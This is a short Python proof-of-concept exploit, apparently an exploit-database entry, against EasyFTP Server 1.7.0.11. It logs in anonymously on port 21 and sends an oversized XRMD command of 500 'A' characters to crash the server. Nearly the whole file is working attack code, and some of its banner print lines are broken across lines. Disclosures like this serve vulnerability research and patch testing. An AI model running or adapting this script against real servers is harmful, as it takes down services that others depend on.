#!/usr/bin/python
#
# e-mail: fernando.mengalli@gmail.com
#
# Date: 06/10/2021 - 10 jun
#
# Version Vulnerable: EasyFTP Server 1.7.0.11 - 'XRMD' Denied of Service
#
# OS Tested: Windows XP PACK 3 Brazilian

import socket
import sys

if len(sys.argv) != 2:
    print "########################################################"
    print "#
                                            #"
    print "#  EasyFTP Server 1.7.0.11 - 'XRMD' Denied of Service
         #"
    print "#
                                            #"
    print "#              Author: Fernando Mengali
                           #"
    print "#
                                            #"
    print "#              Usage: exploit.py <IP>
                              #"
    print "#
                                            #"
    print "########################################################"
    sys.exit(1)

target = sys.argv[1]

payload = "A"*500

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, 21))
    print "[+] Conectado com sucesso"
except:
    print "[-] Falha ao conectar para o servidor..."
    sys.exit(0)
s.recv(1024)
print "[+] Autenticando..."
s.send('User anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
print "[+] Enviando pacote crafted..."
s.send('XRMD '+payload+'\r\n')
s.close()